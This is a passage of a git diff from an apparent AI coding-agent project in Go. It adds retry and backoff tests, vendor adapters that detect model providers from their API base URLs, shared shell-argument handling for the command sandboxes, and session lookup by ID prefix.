+		{"ECONNREFUSED", syscall.ECONNREFUSED, 0, true},
+		{"EPIPE", syscall.EPIPE, 0, true},
+		{"ETIMEDOUT", syscall.ETIMEDOUT, 0, true},
+		{"context canceled", context.Canceled, 0, false},
+		{"generic error", errors.New("something"), 0, false},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			got := IsRetryable(tt.err, tt.code)
+			if got != tt.want {
+				t.Errorf("IsRetryable(%v, %d) = %v, want %v", tt.err, tt.code, got, tt.want)
+			}
+		})
+	}
+}
+
+func TestRetryDelay_ExponentialBackoff(t *testing.T) {
+	base := 2000
+
+	d0 := RetryDelay(0, base)
+	d1 := RetryDelay(1, base)
+	d2 := RetryDelay(2, base)
+
+	if d0 != 2000*time.Millisecond {
+		t.Errorf("delay(0) = %v, want 2s", d0)
+	}
+	if d1 != 4000*time.Millisecond {
+		t.Errorf("delay(1) = %v, want 4s", d1)
+	}
+	if d2 != 8000*time.Millisecond {
+		t.Errorf("delay(2) = %v, want 8s", d2)
+	}
+}
+
+func TestRetryDelay_CappedAt30s(t *testing.T) {
+	d := RetryDelay(10, 5000)
+	if d > 30*time.Second {
+		t.Errorf("delay(10, 5000) = %v, want <= 30s", d)
+	}
+}
+
+func TestRetryDelay_DefaultBase(t *testing.T) {
+	d := RetryDelay(0, 0) // baseDelayMs <= 0 defaults to 2000
+	if d != 2000*time.Millisecond {
+		t.Errorf("delay(0, 0) = %v, want 2s", d)
+	}
+}
+
+func TestFormatRetryMessage_Timeout(t *testing.T) {
+	msg := FormatRetryMessage(0, 3, 2*time.Second, fmt.Errorf("context deadline exceeded"))
+	if msg == "" {
+		t.Error("expected non-empty message")
+	}
+	t.Logf("timeout: %s", msg)
+}
+
+func TestFormatRetryMessage_RateLimited(t *testing.T) {
+	msg := FormatRetryMessage(1, 3, 4*time.Second, fmt.Errorf("HTTP 429: rate limit"))
+	if msg == "" {
+		t.Error("expected non-empty message")
+	}
+	t.Logf("rate limited: %s", msg)
+}
+
+func TestFormatRetryMessage_ConnectionRefused(t *testing.T) {
+	msg := FormatRetryMessage(2, 3, 8*time.Second, fmt.Errorf("connection refused"))
+	if msg == "" {
+		t.Error("expected non-empty message")
+	}
+	t.Logf("conn refused: %s", msg)
+}
+
+func TestFormatRetryMessage_Generic(t *testing.T) {
+	msg := FormatRetryMessage(0, 3, 2*time.Second, fmt.Errorf("some random error"))
+	if msg == "" {
+		t.Error("expected non-empty message")
+	}
+	t.Logf("generic: %s", msg)
+}
diff --git a/internal/provider/types.go b/internal/provider/types.go
index e1d7b4c..05589c1 100644
--- a/internal/provider/types.go
+++ b/internal/provider/types.go
@@ -112,6 +112,7 @@ func NewToolResultMessageWithContents(toolCallID, toolName, text string, content
 type Usage struct {
 	Input       int  `json:"input"`
 	Output      int  `json:"output"`
+	Reasoning   int  `json:"reasoning,omitempty"`
 	CacheRead   int  `json:"cacheRead"`
 	CacheWrite  int  `json:"cacheWrite"`
 	TotalTokens int  `json:"totalTokens"`
@@ -216,8 +217,32 @@ type Model struct {
 	Reasoning     bool         `json:"reasoning"` // supports extended thinking
 	Input         []string     `json:"input"`     // "text", "image"
 	Cost          ModelPricing `json:"cost"`
-	ContextWindow int          `json:"contextWindow"` // max context tokens
-	MaxTokens     int          `json:"maxTokens"`     // max output tokens
+	ContextWindow int          `json:"contextWindow"`         // max context tokens
+	MaxTokens     int          `json:"maxTokens"`             // max output tokens
+	Temperature   *float64     `json:"temperature,omitempty"` // nil = use API default
+	TopP          *float64     `json:"topP,omitempty"`        // nil = use API default
+	Compat        *ModelCompat `json:"compat,omitempty"`
+}
+
+// ModelCompat captures vendor-specific behavior flags for otherwise compatible APIs.
+type ModelCompat struct {
+	ThinkingFormat                      string `json:"thinkingFormat,omitempty"`
+	RequiresReasoningContentOnAssistant bool   `json:"requiresReasoningContentOnAssistant,omitempty"`
+	ForceAdaptiveThinking               bool   `json:"forceAdaptiveThinking,omitempty"`
+
+	SupportsDeveloperRole   *bool  `json:"supportsDeveloperRole,omitempty"`
+	SupportsStore           *bool  `json:"supportsStore,omitempty"`
+	SupportsReasoningEffort *bool  `json:"supportsReasoningEffort,omitempty"`
+	SupportsStrictMode      *bool  `json:"supportsStrictMode,omitempty"`
+	MaxTokensField          string `json:"maxTokensField,omitempty"`
+
+	SupportsCacheControlOnTools *bool `json:"supportsCacheControlOnTools,omitempty"`
+	SupportsLongCacheRetention  *bool `json:"supportsLongCacheRetention,omitempty"`
+	SupportsPromptCacheKey      *bool `json:"supportsPromptCacheKey,omitempty"`
+	SupportsReasoningSummary    *bool `json:"supportsReasoningSummary,omitempty"`
+	SendSessionAffinityHeaders  bool  `json:"sendSessionAffinityHeaders,omitempty"`
+
+	SupportsEagerToolInputStreaming *bool `json:"supportsEagerToolInputStreaming,omitempty"`
 }
 
 // ThinkingLevel represents the depth of reasoning.
@@ -234,23 +259,28 @@ const (
 
 // ToolDefinition describes a tool available to the model.
 type ToolDefinition struct {
-	Name        string          `json:"name"`
-	Description string          `json:"description"`
-	Parameters  json.RawMessage `json:"parameters"` // JSON Schema
+	Name         string          `json:"name"`
+	Description  string          `json:"description"`
+	Parameters   json.RawMessage `json:"parameters"`     // JSON Schema
+	Kind         string          `json:"kind,omitempty"` // "function" (default) or "hosted"
+	Provider     string          `json:"provider,omitempty"`
+	ProviderType string          `json:"providerType,omitempty"`
+	Model        string          `json:"model,omitempty"`
 }
 
 // StreamEventType identifies the type of a streaming event.
 type StreamEventType int
 
 const (
-	StreamStart           StreamEventType = iota // Stream started
-	StreamTextDelta                              // Text content delta
-	StreamThinkDelta                             // Thinking content delta
-	StreamThinkSignature                         // Thinking block signature (for multi-turn replay)
-	StreamToolCall                               // Tool call event
-	StreamUsage                                  // Usage statistics
-	StreamDone                                   // Stream completed
-	StreamError                                  // Error occurred
+	StreamStart          StreamEventType = iota // Stream started
+	StreamTextDelta                             // Text content delta
+	StreamThinkDelta                            // Thinking content delta
+	StreamThinkSignature                        // Thinking block signature (for multi-turn replay)
+	StreamToolCall                              // Tool call event
+	StreamUsage                                 // Usage statistics
+	StreamDone                                  // Stream completed
+	StreamError                                 // Error occurred
+	StreamRetry                                 // Retry attempt in progress
 )
 
 // StreamEvent represents a single event from a streaming response.
@@ -263,6 +293,8 @@ type StreamEvent struct {
 	Usage          *Usage         // for StreamUsage
 	Error          error          // for StreamError
 	StopReason     string         // for StreamDone: "stop", "length", "toolUse", "error", "aborted"
+	RetryAttempt   int            // for StreamRetry: current attempt number
+	RetryMax       int            // for StreamRetry: max attempts
 }
 
 // ChatParams contains all parameters for a chat request.
@@ -272,6 +304,8 @@ type ChatParams struct {
 	SystemPrompt  string
 	ThinkingLevel ThinkingLevel
 	MaxTokens     int
+	Temperature   *float64        // nil = use API default
+	TopP          *float64        // nil = use API default
 	ModelID       string          // which model to use
 	Abort         <-chan struct{} // closed to abort the request
 }
diff --git a/internal/provider/vendor.go b/internal/provider/vendor.go
new file mode 100644
index 0000000..7ea15b0
--- /dev/null
+++ b/internal/provider/vendor.go
@@ -0,0 +1,148 @@
+package provider
+
+import (
+	"strings"
+	"sync"
+
+	"github.com/startvibecoding/vibecoding/internal/config"
+)
+
+// AdapterConfig is the provider configuration after vendor defaults are applied.
+type AdapterConfig struct {
+	Vendor         string
+	API            string
+	BaseURL        string
+	ThinkingFormat string
+	CacheControl   *bool
+}
+
+// VendorAdapter applies vendor-specific defaults while keeping protocol providers generic.
+type VendorAdapter interface {
+	Name() string
+	MatchBaseURL(baseURL string) bool
+	Apply(*AdapterConfig)
+}
+
+type simpleVendorAdapter struct {
+	name           string
+	domains        []string
+	thinkingFormat string
+	cacheControl   *bool
+	defaultAPI     string
+}
+
+func (a simpleVendorAdapter) Name() string { return a.name }
+
+func (a simpleVendorAdapter) MatchBaseURL(baseURL string) bool {
+	lower := strings.ToLower(baseURL)
+	for _, domain := range a.domains {
+		if strings.Contains(lower, strings.ToLower(domain)) {
+			return true
+		}
+	}
+	return false
+}
+
+func (a simpleVendorAdapter) Apply(cfg *AdapterConfig) {
+	if cfg.API == "" && a.defaultAPI != "" {
+		cfg.API = a.defaultAPI
+	}
+	if cfg.ThinkingFormat == "" && a.thinkingFormat != "" {
+		cfg.ThinkingFormat = a.thinkingFormat
+	}
+	if cfg.CacheControl == nil && a.cacheControl != nil {
+		cfg.CacheControl = a.cacheControl
+	}
+}
+
+var vendorRegistry = struct {
+	sync.RWMutex
+	order    []string
+	adapters map[string]VendorAdapter
+}{adapters: make(map[string]VendorAdapter)}
+
+// RegisterVendorAdapter registers a vendor adapter.
+func RegisterVendorAdapter(adapter VendorAdapter) {
+	if adapter == nil || adapter.Name() == "" {
+		return
+	}
+	vendorRegistry.Lock()
+	defer vendorRegistry.Unlock()
+	name := normalizeVendorName(adapter.Name())
+	if _, ok := vendorRegistry.adapters[name]; !ok {
+		vendorRegistry.order = append(vendorRegistry.order, name)
+	}
+	vendorRegistry.adapters[name] = adapter
+}
+
+// GetVendorAdapter returns a registered vendor adapter by name.
+func GetVendorAdapter(name string) (VendorAdapter, bool) {
+	vendorRegistry.RLock()
+	defer vendorRegistry.RUnlock()
+	adapter, ok := vendorRegistry.adapters[normalizeVendorName(name)]
+	return adapter, ok
+}
+
+// ListVendorAdapters returns registered vendor adapter names in registration order.
+func ListVendorAdapters() []string {
+	vendorRegistry.RLock()
+	defer vendorRegistry.RUnlock()
+	names := make([]string, len(vendorRegistry.order))
+	copy(names, vendorRegistry.order)
+	return names
+}
+
+// ResolveAdapterConfig applies provider protocol detection plus vendor defaults.
+func ResolveAdapterConfig(cfg *config.ProviderConfig) AdapterConfig {
+	if cfg == nil {
+		return AdapterConfig{API: "openai-chat"}
+	}
+
+	resolved := AdapterConfig{
+		Vendor:         normalizeVendorName(cfg.Vendor),
+		API:            cfg.API,
+		BaseURL:        cfg.BaseURL,
+		ThinkingFormat: cfg.ThinkingFormat,
+		CacheControl:   cfg.CacheControl,
+	}
+
+	if resolved.Vendor != "" {
+		if adapter, ok := GetVendorAdapter(resolved.Vendor); ok {
+			adapter.Apply(&resolved)
+		}
+		if resolved.API == "" {
+			resolved.API = protocolFromBaseURL(cfg.BaseURL)
+		}
+		return resolved
+	}
+
+	vendorRegistry.RLock()
+	for _, name := range vendorRegistry.order {
+		adapter := vendorRegistry.adapters[name]
+		if adapter.MatchBaseURL(cfg.BaseURL) {
+			resolved.Vendor = name
+			adapter.Apply(&resolved)
+			break
+		}
+	}
+	vendorRegistry.RUnlock()
+
+	if resolved.API == "" {
+		resolved.API = protocolFromBaseURL(cfg.BaseURL)
+	}
+
+	return resolved
+}
+
+func protocolFromBaseURL(baseURL string) string {
+	if strings.Contains(strings.ToLower(baseURL), "anthropic") {
+		return "anthropic-messages"
+	}
+	return "openai-chat"
+}
+
+func normalizeVendorName(name string) string {
+	return strings.ToLower(strings.TrimSpace(name))
+}
+
+func boolPtr(v bool) *bool { return &v }
diff --git a/internal/provider/vendor_anthropic.go b/internal/provider/vendor_anthropic.go
new file mode 100644
index 0000000..f147ecd
--- /dev/null
+++ b/internal/provider/vendor_anthropic.go
@@ -0,0 +1,14 @@
+package provider
+
+func init() {
+	RegisterVendorAdapter(simpleVendorAdapter{
+		name:       "anthropic",
+		domains:    []string{"api.anthropic.com"},
+		defaultAPI: "anthropic-messages",
+	})
+	RegisterVendorAdapter(simpleVendorAdapter{
+		name:       "claude",
+		domains:    []string{},
+		defaultAPI: "anthropic-messages",
+	})
+}
diff --git a/internal/provider/vendor_bailian.go b/internal/provider/vendor_bailian.go
new file mode 100644
index 0000000..28a51d7
--- /dev/null
+++ b/internal/provider/vendor_bailian.go
@@ -0,0 +1,8 @@
+package provider
+
+func init() {
+	RegisterVendorAdapter(simpleVendorAdapter{
+		name:    "bailian",
+		domains: []string{"dashscope.aliyuncs.com"},
+	})
+}
diff --git a/internal/provider/vendor_deepseek.go b/internal/provider/vendor_deepseek.go
new file mode 100644
index 0000000..7c4907e
--- /dev/null
+++ b/internal/provider/vendor_deepseek.go
@@ -0,0 +1,9 @@
+package provider
+
+func init() {
+	RegisterVendorAdapter(simpleVendorAdapter{
+		name:           "deepseek",
+		domains:        []string{"api.deepseek.com"},
+		thinkingFormat: "deepseek",
+	})
+}
diff --git a/internal/provider/vendor_fireworks.go b/internal/provider/vendor_fireworks.go
new file mode 100644
index 0000000..60db264
--- /dev/null
+++ b/internal/provider/vendor_fireworks.go
@@ -0,0 +1,8 @@
+package provider
+
+func init() {
+	RegisterVendorAdapter(simpleVendorAdapter{
+		name:    "fireworks",
+		domains: []string{"api.fireworks.ai"},
+	})
+}
diff --git a/internal/provider/vendor_gitee.go b/internal/provider/vendor_gitee.go
new file mode 100644
index 0000000..8cf73a6
--- /dev/null
+++ b/internal/provider/vendor_gitee.go
@@ -0,0 +1,8 @@
+package provider
+
+func init() {
+	RegisterVendorAdapter(simpleVendorAdapter{
+		name:    "gitee",
+		domains: []string{"ai.gitee.com"},
+	})
+}
diff --git a/internal/provider/vendor_google_gemini.go b/internal/provider/vendor_google_gemini.go
new file mode 100644
index 0000000..f9d10f4
--- /dev/null
+++ b/internal/provider/vendor_google_gemini.go
@@ -0,0 +1,9 @@
+package provider
+
+func init() {
+	RegisterVendorAdapter(simpleVendorAdapter{
+		name:       "google-gemini",
+		domains:    []string{"generativelanguage.googleapis.com"},
+		defaultAPI: "google-gemini",
+	})
+}
diff --git a/internal/provider/vendor_google_vertex.go b/internal/provider/vendor_google_vertex.go
new file mode 100644
index 0000000..0e1abd8
--- /dev/null
+++ b/internal/provider/vendor_google_vertex.go
@@ -0,0 +1,9 @@
+package provider
+
+func init() {
+	RegisterVendorAdapter(simpleVendorAdapter{
+		name:       "google-vertex",
+		domains:    []string{"aiplatform.googleapis.com"},
+		defaultAPI: "google-vertex",
+	})
+}
diff --git a/internal/provider/vendor_groq.go b/internal/provider/vendor_groq.go
new file mode 100644
index 0000000..985d4d5
--- /dev/null
+++ b/internal/provider/vendor_groq.go
@@ -0,0 +1,8 @@
+package provider
+
+func init() {
+	RegisterVendorAdapter(simpleVendorAdapter{
+		name:    "groq",
+		domains: []string{"api.groq.com"},
+	})
+}
diff --git a/internal/provider/vendor_kimi.go b/internal/provider/vendor_kimi.go
new file mode 100644
index 0000000..7fc9162
--- /dev/null
+++ b/internal/provider/vendor_kimi.go
@@ -0,0 +1,8 @@
+package provider
+
+func init() {
+	RegisterVendorAdapter(simpleVendorAdapter{
+		name:    "kimi",
+		domains: []string{"api.moonshot.cn"},
+	})
+}
diff --git a/internal/provider/vendor_minimax.go b/internal/provider/vendor_minimax.go
new file mode 100644
index 0000000..7fd93cd
--- /dev/null
+++ b/internal/provider/vendor_minimax.go
@@ -0,0 +1,8 @@
+package provider
+
+func init() {
+	RegisterVendorAdapter(simpleVendorAdapter{
+		name:    "minimax",
+		domains: []string{"api.minimax.chat"},
+	})
+}
diff --git a/internal/provider/vendor_openai.go b/internal/provider/vendor_openai.go
new file mode 100644
index 0000000..ee1ec4d
--- /dev/null
+++ b/internal/provider/vendor_openai.go
@@ -0,0 +1,9 @@
+package provider
+
+func init() {
+	RegisterVendorAdapter(simpleVendorAdapter{
+		name:       "openai",
+		domains:    []string{"api.openai.com"},
+		defaultAPI: "openai-chat",
+	})
+}
diff --git a/internal/provider/vendor_openrouter.go b/internal/provider/vendor_openrouter.go
new file mode 100644
index 0000000..95bf05d
--- /dev/null
+++ b/internal/provider/vendor_openrouter.go
@@ -0,0 +1,8 @@
+package provider
+
+func init() {
+	RegisterVendorAdapter(simpleVendorAdapter{
+		name:    "openrouter",
+		domains: []string{"openrouter.ai"},
+	})
+}
diff --git a/internal/provider/vendor_qianfan.go b/internal/provider/vendor_qianfan.go
new file mode 100644
index 0000000..0cad43f
--- /dev/null
+++ b/internal/provider/vendor_qianfan.go
@@ -0,0 +1,8 @@
+package provider
+
+func init() {
+	RegisterVendorAdapter(simpleVendorAdapter{
+		name:    "qianfan",
+		domains: []string{"aip.baidubce.com"},
+	})
+}
diff --git a/internal/provider/vendor_seed.go b/internal/provider/vendor_seed.go
new file mode 100644
index 0000000..1b8cf1e
--- /dev/null
+++ b/internal/provider/vendor_seed.go
@@ -0,0 +1,8 @@
+package provider
+
+func init() {
+	RegisterVendorAdapter(simpleVendorAdapter{
+		name:    "seed",
+		domains: []string{"ark.cn-beijing.volces.com"},
+	})
+}
diff --git a/internal/provider/vendor_test.go b/internal/provider/vendor_test.go
new file mode 100644
index 0000000..b395aad
--- /dev/null
+++ b/internal/provider/vendor_test.go
@@ -0,0 +1,118 @@
+package provider
+
+import (
+	"testing"
+
+	"github.com/startvibecoding/vibecoding/internal/config"
+)
+
+func TestResolveAdapterConfigExplicitVendor(t *testing.T) {
+	resolved := ResolveAdapterConfig(&config.ProviderConfig{
+		Vendor:  "deepseek",
+		BaseURL: "https://example.com/v1",
+		API:     "openai-chat",
+	})
+	if resolved.Vendor != "deepseek" {
+		t.Fatalf("Vendor = %q, want deepseek", resolved.Vendor)
+	}
+	if resolved.ThinkingFormat != "deepseek" {
+		t.Fatalf("ThinkingFormat = %q, want deepseek", resolved.ThinkingFormat)
+	}
+}
+
+func TestResolveAdapterConfigExplicitVendorDefaultAPI(t *testing.T) {
+	resolved := ResolveAdapterConfig(&config.ProviderConfig{
+		Vendor: "Anthropic",
+	})
+	if resolved.Vendor != "anthropic" {
+		t.Fatalf("Vendor = %q, want anthropic", resolved.Vendor)
+	}
+	if resolved.API != "anthropic-messages" {
+		t.Fatalf("API = %q, want anthropic-messages", resolved.API)
+	}
+}
+
+func TestResolveAdapterConfigBaseURLDetect(t *testing.T) {
+	resolved := ResolveAdapterConfig(&config.ProviderConfig{
+		BaseURL: "https://api.deepseek.com/anthropic",
+		API:     "anthropic-messages",
+	})
+	if resolved.Vendor != "deepseek" {
+		t.Fatalf("Vendor = %q, want deepseek", resolved.Vendor)
+	}
+	if resolved.ThinkingFormat != "deepseek" {
+		t.Fatalf("ThinkingFormat = %q, want deepseek", resolved.ThinkingFormat)
+	}
+}
+
+func TestResolveAdapterConfigPreservesExplicitThinkingFormat(t *testing.T) {
+	resolved := ResolveAdapterConfig(&config.ProviderConfig{
+		Vendor:         "deepseek",
+		BaseURL:        "https://api.deepseek.com",
+		API:            "openai-chat",
+		ThinkingFormat: "openai",
+	})
+	if resolved.ThinkingFormat != "openai" {
+		t.Fatalf("ThinkingFormat = %q, want explicit openai", resolved.ThinkingFormat)
+	}
+}
+
+func TestResolveAdapterConfigGenericFallback(t *testing.T) {
+	resolved := ResolveAdapterConfig(&config.ProviderConfig{
+		BaseURL: "https://unknown.example.com/v1",
+	})
+	if resolved.Vendor != "" {
+		t.Fatalf("Vendor = %q, want empty", resolved.Vendor)
+	}
+	if resolved.API != "openai-chat" {
+		t.Fatalf("API = %q, want openai-chat", resolved.API)
+	}
+}
+
+func TestResolveAdapterConfigGoogleGemini(t *testing.T) {
+	resolved := ResolveAdapterConfig(&config.ProviderConfig{
+		BaseURL: "https://generativelanguage.googleapis.com/v1beta/models",
+	})
+	if resolved.Vendor != "google-gemini" {
+		t.Fatalf("Vendor = %q, want google-gemini", resolved.Vendor)
+	}
+	if resolved.API != "google-gemini" {
+		t.Fatalf("API = %q, want google-gemini", resolved.API)
+	}
+}
+
+func TestResolveAdapterConfigGoogleVertex(t *testing.T) {
+	resolved := ResolveAdapterConfig(&config.ProviderConfig{
+		BaseURL: "https://aiplatform.googleapis.com/v1/projects/test/locations/global/publishers/google/models",
+	})
+	if resolved.Vendor != "google-vertex" {
+		t.Fatalf("Vendor = %q, want google-vertex", resolved.Vendor)
+	}
+	if resolved.API != "google-vertex" {
+		t.Fatalf("API = %q, want google-vertex", resolved.API)
+	}
+}
+
+func TestVendorFromBaseURLDetectsXiaomiTokenPlan(t *testing.T) {
+	got := VendorFromBaseURL("https://token-plan-cn.xiaomimimo.com/v1")
+	if got != "xiaomi-token-plan-cn" {
+		t.Fatalf("VendorFromBaseURL = %q, want xiaomi-token-plan-cn", got)
+	}
+}
+
+func TestVendorFromBaseURLDetectsGoogleAdapters(t *testing.T) {
+	tests := []struct {
+		url      string
+		expected string
+	}{
+		{"https://generativelanguage.googleapis.com/v1beta/models", "google-gemini"},
+		{"https://aiplatform.googleapis.com/v1/projects/test/locations/global/publishers/google/models", "google-vertex"},
+	}
+
+	for _, tt := range tests {
+		got := VendorFromBaseURL(tt.url)
+		if got != tt.expected {
+			t.Errorf("VendorFromBaseURL(%q) = %q, want %q", tt.url, got, tt.expected)
+		}
+	}
+}
diff --git a/internal/provider/vendor_together.go b/internal/provider/vendor_together.go
new file mode 100644
index 0000000..ff26e60
--- /dev/null
+++ b/internal/provider/vendor_together.go
@@ -0,0 +1,8 @@
+package provider
+
+func init() {
+	RegisterVendorAdapter(simpleVendorAdapter{
+		name:    "together",
+		domains: []string{"api.together.xyz"},
+	})
+}
diff --git a/internal/provider/vendor_xiaomi.go b/internal/provider/vendor_xiaomi.go
new file mode 100644
index 0000000..4a83719
--- /dev/null
+++ b/internal/provider/vendor_xiaomi.go
@@ -0,0 +1,24 @@
+package provider
+
+func init() {
+	RegisterVendorAdapter(simpleVendorAdapter{
+		name:           "xiaomi-token-plan-ams",
+		domains:        []string{"token-plan-ams.xiaomimimo.com"},
+		thinkingFormat: "xiaomi",
+	})
+	RegisterVendorAdapter(simpleVendorAdapter{
+		name:           "xiaomi-token-plan-cn",
+		domains:        []string{"token-plan-cn.xiaomimimo.com"},
+		thinkingFormat: "xiaomi",
+	})
+	RegisterVendorAdapter(simpleVendorAdapter{
+		name:           "xiaomi-token-plan-sgp",
+		domains:        []string{"token-plan-sgp.xiaomimimo.com"},
+		thinkingFormat: "xiaomi",
+	})
+	RegisterVendorAdapter(simpleVendorAdapter{
+		name:           "xiaomi",
+		domains:        []string{"api.xiaomimimo.com", "api.xiaomi.com"},
+		thinkingFormat: "xiaomi",
+	})
+}
diff --git a/internal/sandbox/mac.go b/internal/sandbox/mac.go
index 6703517..5e7494f 100644
--- a/internal/sandbox/mac.go
+++ b/internal/sandbox/mac.go
@@ -10,6 +10,8 @@ import (
 	"path/filepath"
 	"strings"
 	"sync"
+
+	"github.com/startvibecoding/vibecoding/internal/platform"
 )
 
 // macSandbox implements sandbox using macOS sandbox-exec (Seatbelt).
@@ -91,7 +93,7 @@ func (s *macSandbox) WrapCommand(ctx context.Context, shell, cmd string, opts Ex
 	profilePath := f.Name()
 
 	// sandbox-exec -f profile.sb command
-	args := []string{"-f", profilePath, shell, "-c", cmd}
+	args := append([]string{"-f", profilePath, shell}, platform.ShellArgs(shell, cmd)...)
 	c := exec.CommandContext(ctx, "sandbox-exec", args...)
 	c.Dir = opts.WorkDir
 
diff --git a/internal/sandbox/none.go b/internal/sandbox/none.go
index f84dbd1..326361b 100644
--- a/internal/sandbox/none.go
+++ b/internal/sandbox/none.go
@@ -5,6 +5,8 @@ import (
 	"os"
 	"os/exec"
 	"strings"
+
+	"github.com/startvibecoding/vibecoding/internal/platform"
 )
 
 // NoneSandbox executes commands without any sandbox restrictions.
@@ -18,7 +20,7 @@ func NewNoneSandbox() *NoneSandbox {
 // WrapCommand returns a plain command without any sandbox restrictions.
 // It inherits the full parent environment and overlays opts.EnvVars on top.
 func (s *NoneSandbox) WrapCommand(ctx context.Context, shell, cmd string, opts ExecOpts) *exec.Cmd {
-	c := exec.CommandContext(ctx, shell, "-c", cmd)
+	c := exec.CommandContext(ctx, shell, platform.ShellArgs(shell, cmd)...)
 
 	if opts.WorkDir != "" {
 		c.Dir = opts.WorkDir
diff --git a/internal/sandbox/sandbox_test.go b/internal/sandbox/sandbox_test.go
index 4c90ad2..6f0546c 100644
--- a/internal/sandbox/sandbox_test.go
+++ b/internal/sandbox/sandbox_test.go
@@ -85,6 +85,30 @@ func TestNoneSandboxWrapCommand(t *testing.T) {
 	}
 }
 
+func TestNoneSandboxWrapCommandUsesPlatformShellArgs(t *testing.T) {
+	sb := NewNoneSandbox()
+
+	cmd := sb.WrapCommand(context.Background(), "cmd.exe", "echo hello", ExecOpts{})
+	if cmd == nil {
+		t.Fatal("expected non-nil command")
+	}
+	if len(cmd.Args) != 3 || cmd.Args[1] != "/c" || cmd.Args[2] != "echo hello" {
+		t.Fatalf("expected cmd.exe arguments to use /c, got %#v", cmd.Args)
+	}
+
+	cmd = sb.WrapCommand(context.Background(), "PowerShell.exe", "echo hello", ExecOpts{})
+	if cmd == nil {
+		t.Fatal("expected non-nil command")
+	}
+	if len(cmd.Args) != 5 ||
+		cmd.Args[1] != "-NoProfile" ||
+		cmd.Args[2] != "-NonInteractive" ||
+		cmd.Args[3] != "-Command" ||
+		cmd.Args[4] != "echo hello" {
+		t.Fatalf("expected PowerShell arguments, got %#v", cmd.Args)
+	}
+}
+
 func TestNewBwrapSandbox(t *testing.T) {
 	sb := NewBwrapSandbox("/tmp", LevelStandard)
 
@@ -207,6 +231,62 @@ func TestFormatSandboxInfoNil(t *testing.T) {
 	}
 }
 
+func TestManagerSetLevelNone(t *testing.T) {
+	m := NewManager("/tmp")
+
+	// Set to none should always work
+	err := m.SetLevel(LevelNone)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	sb := m.GetActive()
+	if sb.Level() != LevelNone {
+		t.Errorf("expected level %d, got %d", LevelNone, sb.Level())
+	}
+}
+
+func TestManagerGetForLevelInvalid(t *testing.T) {
+	m := NewManager("/tmp")
+
+	_, err := m.GetForLevel(Level(99))
+	if err == nil {
+		t.Error("expected error for invalid level")
+	}
+}
+
+func TestBwrapWrapCommand(t *testing.T) {
+	sb := NewBwrapSandbox("/tmp", LevelStandard)
+
+	cmd := sb.WrapCommand(context.Background(), "/bin/bash", "echo hello", ExecOpts{
+		WorkDir:       "/tmp",
+		WritablePaths: []string{"/tmp/extra"},
+		ReadOnlyPaths: []string{"/opt/readonly"},
+		NetworkAccess: true,
+		EnvVars:       map[string]string{"FOO": "bar"},
+	})
+
+	if cmd == nil {
+		t.Fatal("expected non-nil command")
+	}
+	// cmd.Args should contain bwrap or fallback to raw command
+	if len(cmd.Args) == 0 {
+		t.Error("expected non-empty args")
+	}
+}
+
+func TestBwrapStrictLevel(t *testing.T) {
+	sb := NewBwrapSandbox("/tmp", LevelStrict)
+
+	cmd := sb.WrapCommand(context.Background(), "/bin/bash", "ls", ExecOpts{
+		WorkDir: "/tmp",
+	})
+
+	if cmd == nil {
+		t.Fatal("expected non-nil command")
+	}
+}
+
 func TestExecOpts(t *testing.T) {
 	opts := ExecOpts{
 		WritablePaths: []string{"/tmp"},
diff --git a/internal/sandbox/windows.go b/internal/sandbox/windows.go
index d2bb35b..ea7f34c 100644
--- a/internal/sandbox/windows.go
+++ b/internal/sandbox/windows.go
@@ -7,6 +7,8 @@ import (
 	"os"
 	"os/exec"
 	"path/filepath"
+
+	"github.com/startvibecoding/vibecoding/internal/platform"
 )
 
 // winSandbox implements a basic sandbox for Windows.
@@ -58,15 +60,7 @@ func (s *winSandbox) WrapCommand(ctx context.Context, shell, cmd string, opts Ex
 		shell = "cmd.exe"
 	}
 
-	var args []string
-	if shell == "cmd.exe" {
-		args = []string{"/c", cmd}
-	} else {
-		// PowerShell
-		args = []string{"-NoProfile", "-NonInteractive", "-Command", cmd}
-	}
-
-	c := exec.CommandContext(ctx, shell, args...)
+	c := exec.CommandContext(ctx, shell, platform.ShellArgs(shell, cmd)...)
 	c.Dir = opts.WorkDir
 
 	// Build restricted environment
diff --git a/internal/session/session.go b/internal/session/session.go
index c468fe1..6dff955 100644
--- a/internal/session/session.go
+++ b/internal/session/session.go
@@ -5,6 +5,7 @@ import (
 	"encoding/base64"
 	"encoding/json"
 	"fmt"
+	"log"
 	"os"
 	"path/filepath"
 	"sort"
@@ -83,7 +84,23 @@ func ContinueRecent(cwd, sessionDir string) (*Manager, error) {
 		return Open(sessions[0].Path)
 	}
 
-	return New(cwd, sessionDir), nil
+	m := New(cwd, sessionDir)
+	if err := m.Init(); err != nil {
+		return nil, err
+	}
+	return m, nil
+}
+
+// OpenByPathOrID opens a session using either an explicit file path or a
+// session ID for the supplied working directory.
+func OpenByPathOrID(cwd, sessionDir, value string) (*Manager, error) {
+	if value == "" {
+		return nil, fmt.Errorf("session value is empty")
+	}
+	if strings.HasSuffix(value, ".jsonl") || strings.ContainsRune(value, os.PathSeparator) {
+		return Open(value)
+	}
+	return OpenByID(cwd, sessionDir, value)
 }
 
 // SessionInfo contains metadata about a session file.
@@ -146,6 +163,10 @@ func (m *Manager) InitWithID(id string) error {
 	m.mu.Lock()
 	defer m.mu.Unlock()
 
+	return m.initWithIDLocked(id)
+}
+
+func (m *Manager) initWithIDLocked(id string) error {
 	now := time.Now()
 	if id == "" {
 		id = GenerateID()
@@ -173,29 +194,63 @@ func (m *Manager) InitWithID(id string) error {
 	return m.writeEntry(m.header)
 }
 
+func (m *Manager) ensureInitializedLocked() error {
+	if m.file != "" {
+		return nil
+	}
+	return m.initWithIDLocked("")
+}
+
 // OpenByID opens the most recent session file for cwd whose session header ID matches sessionID.
 func OpenByID(cwd, sessionDir, sessionID string) (*Manager, error) {
 	sessions, err := ListForDir(cwd, sessionDir)
 	if err != nil {
 		return nil, err
 	}
+	var match *Manager
 	for _, s := range sessions {
 		mgr, err := Open(s.Path)
 		if err != nil {
 			continue
 		}
-		if hdr := mgr.GetHeader(); hdr != nil && hdr.ID == sessionID {
+		hdr := mgr.GetHeader()
+		if hdr == nil {
+			continue
+		}
+		if hdr.ID == sessionID {
 			return mgr, nil
 		}
+		if strings.HasPrefix(hdr.ID, sessionID) || strings.HasPrefix(sessionFileID(s.Path), sessionID) {
+			if match != nil {
+				return nil, fmt.Errorf("session ID %s is ambiguous for cwd %s", sessionID, cwd)
+			}
+			match = mgr
